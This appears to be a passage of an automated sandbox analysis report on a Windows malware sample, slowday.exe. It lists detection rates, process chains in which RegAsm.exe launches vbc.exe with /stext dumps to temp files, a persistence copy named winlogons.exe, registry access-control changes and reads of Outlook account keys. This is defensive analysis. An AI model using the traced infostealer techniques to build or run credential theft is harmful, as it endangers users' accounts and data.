            Source: 7.3.winlogons.exe.3790000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 1.0.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 1.0.RegAsm.exe.400000.1.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 0.3.slowday.exe.3b50000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
            Source: 1.2.RegAsm.exe.400000.0.unpack, u200d????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 8.0.RegAsm.exe.400000.0.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 8.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
            Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
            Source: 1.0.RegAsm.exe.400000.1.unpack, u202a????????????????????????????????????????.csSecurity API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
            Source: 8.0.RegAsm.exe.400000.0.unpack, u200b????????????????????????????????????????.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E2A0F4 GetLastError,FormatMessageW,
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00DC4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,
            Source: slowday.exeVirustotal: Detection: 74%
            Source: slowday.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\slowday.exeFile read: C:\Users\user\Desktop\slowday.exeJump to behavior
            Source: C:\Users\user\Desktop\slowday.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\slowday.exe "C:\Users\user\Desktop\slowday.exe"
            Source: C:\Users\user\Desktop\slowday.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\winlogons\winlogons.exe "C:\Users\user\AppData\Roaming\winlogons\winlogons.exe"
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
            Source: C:\Users\user\Desktop\slowday.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpF1A4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp33E2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8255.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp8271.tmp
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp36CB.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp7E2A.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpC5B7.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp43C.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmp4F4.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_07EE0C02 AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_07EE0BCB AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\18da55c1-2652-5cda-252b-e5d7f7077c5dJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00418073 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: vbc.exe, 00000002.00000000.250900010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.260557591.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000002.00000000.250194862.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: vbc.exe, vbc.exe, 00000006.00000000.264721793.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000000.264261616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282627895.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.286407831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000000.287088457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299433520.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.289826326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000000.288795370.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301895428.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320177250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.305940458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000013.00000000.304934394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.323491237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333182341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000015.00000000.322493332.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.336392806.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346827164.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.335351115.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
            Source: C:\Users\user\Desktop\slowday.exeCode function: 0_2_00E23C99 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\2132e5f5-d8d3-4986-a43e-f587e2be7b15
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Users\user\AppData\Roaming\winlogons\winlogons.exeMutant created: \Sessions\1\BaseNamedObjects\MdmDiagnosticsTool
            Source: 0.3.slowday.exe.3b50000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.slowday.exe.3b50000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u206b????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.2.RegAsm.exe.400000.0.unpack, u202d????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
